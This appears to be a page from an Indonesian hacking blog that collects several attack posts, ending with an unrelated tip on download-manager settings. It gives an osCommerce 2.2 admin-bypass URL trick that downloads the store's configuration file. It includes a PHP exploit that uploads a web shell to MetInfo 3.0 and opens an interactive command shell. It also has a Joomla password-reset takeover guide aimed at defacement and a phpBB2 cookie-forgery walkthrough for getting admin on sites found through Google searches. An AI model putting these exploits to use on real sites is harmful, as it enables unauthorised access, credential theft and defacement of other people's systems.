Oscommerce Oline Merchant

Author : Bintang

Date : May, 30, 2010

Location : Bekasi, Indonesia

Time Zone : GMT +7:00

Software : OsCommerce Online Merchant v2.2

Tested on : All OS

--------------------------------------------

Email : bintang@hackermail.com

gReets : Indonesian Hacker

WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be

Spykit, BobyHikaru, Fribo. all member.

Site : Http://www.Devilzc0de.org/forum/

Forum : Http://Indonesianhacker.or.id/

--------------------------------------------

# ByPass Page Admin :

You can use this Trick if admin folder not protected by .htaccess

if you Want to explore admin page without login. You can use /login.php behind the name of the file

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can See all file in Directory Oscommerce.. haha ;)

and you can download all file with tRick above

# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Portable Visual Basic 6

Di sini

Tools Melihat Daleman EXE

Download Di Sini

MetInfo 3.0 (fckeditor) Arbitrary File Upload Vulnerability

# Exploit Title: [MetInfo 3.0 (fckeditor) File Upload Exploit]
# Date: [02-11-2010]
# Author: [Bintang]
# Software Link: [http://www.metinfo.cn/upload/file/metinfo3.0.zip]
# Version: [3.0]
# Tested on: [BT4 Ubuntu, Windows 7 Ultimate]
# Exploit:
metinfo.pe/fckeditor/editor/filemanager/connectors/uploadtest.html
POC=>metinfo.pe/upload

*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n| MetInfo 3.0 File Upload (fckeditor) sh3n |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2) { print "\nUsage......: php $argv[0] metinfo.pe path"; print "\nExample....: php $argv[0] localhost /fckeditor/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $data = "--xSsT0rm\r\n"; $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh3n.php.pdf\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n"; $data .= "\n";
$data .= "----xSsT0rm--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=xSsT0rm\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...have phun!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nsh3n-box# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}upload/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>

Tips Hacking Reset Password Joomla

Cuma mau sharing aja, biar adminnnya agak pusing, kalo pas deface di joomla
coba reset passwordnya...

pas di exploitnya, biasanya orang nulis (0x3a,username,password)
coba ganti ke (username,0x3a,activation,0x3a,email)
setelah ketemu semuanya, email, activation dan username

langsung pasang link reset password yaitu
/index.php?option=com_user&view=reset

biasanya ada masalah, kode "activation" atau "token" jarang ketemu di exploitnya
tapi tenang aja, ada cara munculin token...
pas masuk di reset password, akan disuruh masukin email, lalu token, setelah itu reset password sesuka hati

pada saat disuruh masukin token, kembali ke page exploit, dan klik refresh...
alhasil keluar token disebelah kanan username
jika token mengandung lambang dollar ($), berarti actiationya nggk berfungsi, artinya cari website lain
hehehheD

kalau tidak ada unsur dollar ($) nya
masukin deh tokennya, ikutin langkahnya...
kalo udah di reset passwordnya, tinggal masuk halaman administrator

Tutorial Deface Phbb

Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
1. Buka browser Mozilla FireFox

2. Download pluginnya yg bernama LiveHTTPHeader
DI sini
cari yg paling baru

3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target

7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

\_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi

11. selanjutnya perhatikan langkah di bawah ini:

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:

Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602b aahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2" ;}

12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

13. perhatikan lagi langkah ini:

Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602 baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2 ";}
\___________________________bagian ini jg digantilagi_______________________________/

menjadi seperti ini:

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologini d%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222 %22%3B%7D

14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul

mohon maaf y kk master klu ada yang salah maklum Newbie

Cara Mempercepat IDM(Internet Download Manager)

Setting idm yg benar-benar ngacir !! woooooow
Bagi agan2 yang menggunakan download manager IDM, kadang belum benar-benar merasakan manfaat dari SW tsb, karena belum disetting dengan benar. Jika sudah diseting, IDM akan berfungsi optimal, meskipun kita gonta-ganti tipe koneksi (wive-LAN, WIFI, Dial-up, dll).

Gini caranya:
1. klik IDM di try icon
2. klik Option
3. Pada Connection/ Speed, pilih Other, dan pada Default Max conn.number pilih 16
4. Tutup IDM
5. Jalankan Regedit>HKey_Current_User>Software>Download Manager> (lihat jendela kanan) Connection Speed>double click>pilih decimal> isi dengan 9999999999999>OK
6. tutup regedit (close )
7. Coba ntuk DL....;-)
Catatan:
Kecepatan Download dipengaruhi juga oleh kondisi jaringan yg ada...


just share .